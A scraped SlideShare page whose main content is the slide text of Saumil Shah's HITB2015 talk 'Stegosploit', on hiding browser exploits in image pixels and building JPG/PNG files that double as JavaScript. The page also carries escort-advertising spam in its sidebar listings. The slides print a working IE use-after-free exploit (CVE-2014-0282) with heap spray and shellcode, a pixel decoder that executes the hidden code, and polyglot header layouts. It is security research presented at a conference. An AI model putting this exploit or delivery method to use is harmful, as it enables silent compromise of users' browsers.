introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
VishalKumarJha10
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Steffen Staab
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
Presentation.STUDIO
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
VictorSzoltysek
 

Kürzlich hochgeladen (20)

The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 

Stegosploit - Hacking With Pictures HITB2015AMS

  • 2. net-square About Me @therealsaumil saumilshah hacker, trainer, speaker, author, photographer educating, entertaining and exasperating audiences since 1999 Saumil Shah CEO, Net-Square
  • 3. net-square "A good exploit is one that is delivered with style"
  • 4. net-square Stegosploit - Motivations I <3 Photography + I <3 Browser Exploits = I <3 (Photography + Browser Exploits)
  • 5. net-square Hiding In Plain Sight can't stop what you can't see
  • 6. net-square A bit of History •  Traditional Steganography •  GIFAR concatenation •  PHP/ASP webshells appending/ embedding tags <?php..?> <%..%> •  XSS in EXIF data
  • 7. net-square Stegosploit is... not a 0-day attack with a cute logo not exploit code hidden in EXIF not a PHP/ASP webshell not a new XSS vector Stegosploit lets you deliver existing BROWSER EXPLOITS using pictures.
  • 8. net-square "The message does not attract attention to itself as an object of scrutiny" Steganography
  • 11. net-square Dangerous Content Is ...Dangerous Attack Payload SAFE decoder DANGEROUS Pixel Data
  • 12. net-square Hacking with pictures, in style! •  Network traffic - ONLY image files. •  Exploit hidden in pixels. – no visible aberration or distortion. •  Image "auto runs" upon load. – decoder code bundled WITH the image. •  Exploit automatically decoded and triggered. •  ...all with 1 image.
  • 13. net-square Hiding the Exploit Code in the Image Step 1
  • 14. net-square Hiding an Exploit in an Image •  Simple steganography techniques. •  Encode exploit code bitstream into lesser significant bits of RGB values. •  Spread the pixels around e.g. 4x4 grid.
  • 15. net-square kevin.jpg Face Painting an Exploit function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flatten=function(){for(var f=0;f<this.d.length;f+ +){var n=this.d[f];if(typeof(n)=='number'){var c=n.toString(16);while(c.length<8){c='0'+c}var l=function(a) {return(parseInt(c.substr(a,2),16))};var g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);this.f.push(h);this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var d=0;d<n.length;d++){this.f.push(n.charCodeAt(d))}}}};H5.prototype.fill=function(a){for(var c=0,b=0;c<a.data.length;c++,b ++){if(b>=8192){b=0}a.data[c]=(b<this.f.length)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var b=0;b<d;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var a=c.getContext('2d').createImageData(c.width,c.height);this.fill(a);this.m[b]=a}};H5.prototype.setData=function(a) {this.d=a};var flag=false;var heap=new H5();try{location.href='ms-help:'}catch(e){}function spray(){var a='xfc xe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4a x26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3c x01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8b x01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8b x58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a x51xffxe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8bx6fx87xffxd5xbb xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xff xd5x63x61x6cx63x2ex65x78x65x00';var c=[];for(var b=0;b<1104;b+=4){c.push(1371756628)} c.push(1371756627);c.push(1371351263);var f=[1371756626,215,2147353344,1371367674,202122408,4294967295,202122400,202122404,64,202116108,2021212 48,16384];var d=c.concat(f);d.push(a);heap.setData(d);heap.spray(256)}function changer(){var c=new Array();for(var a=0;a<100;a++){c.push(document.createElement('img'))}if(flag) {document.getElementById('fm').innerHTML='';CollectGarbage();var b='u2020u0c0c';for(var a=4;a<110;a+=2){b +='u4242'}for(var a=0;a<c.length;a++){c[a].title=b}}}function run() {spray();document.getElementById('c2').checked=true;document.getElementById('c2').onpropertychange=changer;flag= true;document.getElementById('fm').reset()}setTimeout(run,1000); IE Use-After-Free CVE-2014-0282
  • 16. net-square kevin.jpg Bit layer 7 (MSB) Bit layer 6 Bit layer 5 Bit layer 4 Bit layer 3 Bit layer 2 Bit layer 1 Bit layer 0 (LSB) Image separated into Bit Layers
  • 17. net-square Encoding data at bit layer 7 Significant visual distortion.
  • 18. net-square Encoding data at bit layer 2 Negligble visual distortion while encoding at lower layers.
  • 19. net-square Encoding data at bit layer 2 Encoded pixels visible in certain parts when bit layer 2 is filtered and equalized Final encoded image shows no perceptible visual aberration or distortion.
  • 20. net-square Encoding on JPG •  JPG – lossy compression. •  Pixels may be approximated to their nearest neighbours. •  Overcoming lossy compression by ITERATIVE ENCODING. •  Can't go too deep down the bit layers. •  IE's JPG encoder is terrible! •  Browser specific JPG quirks.
  • 21. net-square Encoding on PNG •  Lossless compression. •  Can encode at bit layer 0. – minimum visual distortion. •  Independent of browser library implementation. •  Single pass encoding. •  JPG is still more popular than PNG!
  • 23. net-square HTML5 CANVAS is our friend! •  Read image pixel data using JS. •  In-browser decoding of steganographically encoded images.
  • 24. net-square The Decoder var bL=2,eC=3,gr=3;function i0(){px.onclick=dID}function dID(){var b=document.createElement("canvas");px.parentNode.insertBefore(b,px);b.width =px.width;b.height=px.height;var m=b.getContext("2d");m.drawImage(px, 0,0);px.parentNode.removeChild(px);var f=m.getImageData(0,0,b.width,b.height).data;var h=[],j=0,g=0;var c=function(p,o,u){n=(u*b.width+o)*4;var z=1<<bL;var s=(p[n]&z)>>bL;var q=(p[n+1]&z)>>bL;var a=(p[n+2]&z)>>bL;var t=Math.round((s+q+a)/ 3);switch(eC){case 0:t=s;break;case 1:t=q;break;case 2:t=a;break;} return(String.fromCharCode(t+48))};var k=function(a){for(var q=0,o=0;o<a*8;o++){h[q++]=c(f,j,g);j+=gr;if(j>=b.width){j=0;g +=gr}}};k(6);var d=parseInt(bTS(h.join("")));k(d);try{CollectGarbage()} catch(e){}exc(bTS(h.join("")))}function bTS(b){var a="";for(i=0;i<b.length;i+=8)a+=String.fromCharCode(parseInt(b.substr(i,8), 2));return(a)}function exc(b){var a=setTimeout((new Function(b)),100)} window.onload=i0;
  • 26. net-square When is an image not an image? When it is Javascript!
  • 28. net-square IMAJS – The Concept Image Javascript Holy Sh** Bipolar Content! <img> sees pixels <script> sees code #YourPointOfView
  • 29. net-square Cross Container Scripting - XCS <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script>
  • 30. net-square Image Formats Supported BMP GIF PNG JPG IMAJS Easy Easy Hard (00 in header) Hard (Lossy) Alpha Yes No <CANVAS> ? Yes Yes Colours RGB Paletted RGB RGB Extra Data EXIF
  • 31. net-square Hat tip: Michael Zalewski @lcamtuf I JPG All new IMAJS-JPG! JPG +HTML +JS +CSS
  • 33. net-square Be conservative in what you send, be liberal in what you accept. - Jon Postel
  • 34. net-square JPG Secret Sauce Regular JPEG Header FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 FF E2 ... Start marker length next section... "J F I F 0" Modified JPEG Header FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... Start marker length next section... "J F I F 0" whole lot of extra space!
  • 35. net-square JPG Secret Sauce Modified JPEG Header See the difference? FF D8 FF E0 /* 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 */='';alert(Date());/*...41 41 41 FF E2 ... Start marker comment! next section...Javascript goes here FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... Start marker length next section... "J F I F 0" whole lot of extra space!
  • 36. net-square I PNG All new IMAJS-PNG! PNG +HTML +JS +CSS
  • 37. net-square PNG Secret Sauce - FourCC PNG Header 89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk www.fourcc.org
  • 38. net-square PNG Secret Sauce - FourCC PNG Header 89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC tEXtlength <html> <!-- CRC tEXtlength _ random chars ... CRC ... random chars ... --> <decoder HTML and script goes here ..> <script type=text/undefined>/*... extra tEXt chunk extra tEXt chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk Inspiration: http://daeken.com/superpacking-js-demos
  • 39. net-square The Finer Points of Package Delivery Step 4
  • 40. net-square A Few Browser Tricks... Content Sniffing Expires and Cache-Control Clever CSS
  • 42. net-square Dive Into Cache GET /stego.jpg HTTP 200 OK Expires: May 30 2015 GET /stego.jpg o hai o hai
  • 43. net-square IE CInput Use-After-Free stego IMAJS PWN! CVE-2014-0282
  • 46. net-square Exploit code encoded in image. EVIL GET /lolcat.png 200 OK Expires: 6 months I'M IN UR BASE Decoder script references image from cache. SAFE GET /lolcat.png Load from cache ....KILLING UR DOODZ FEB 2015 MAY 2015 < ATTACK TIMELINE
  • 47. net-square Conclusions - Offensive •  Lot of possibilities! •  Weird containers, weird encoding, weird obfuscation. •  Image attacks emerging "in the wild". •  CANVAS + CORS = spread the payloads. •  Not limited to just browsers.
  • 48. net-square Conclusions - Defensive •  DFIR nightmare. – how far back does your window of inspection go? •  Can't rely on extensions, file headers, MIME types or magic numbers. •  Wake up call to browser-wallahs. •  Quick "fix" – re-encode all images!
  • 49. net-square FAQs •  Why did you do this? •  Is Chrome safe? Safari? •  Won't an IMAJS file be detected on the wire? (HTML mixed in JPG/PNG data) •  Can I encode Flash exploits? •  Is this XSS? •  Are you releasing the code? PoC||GTFO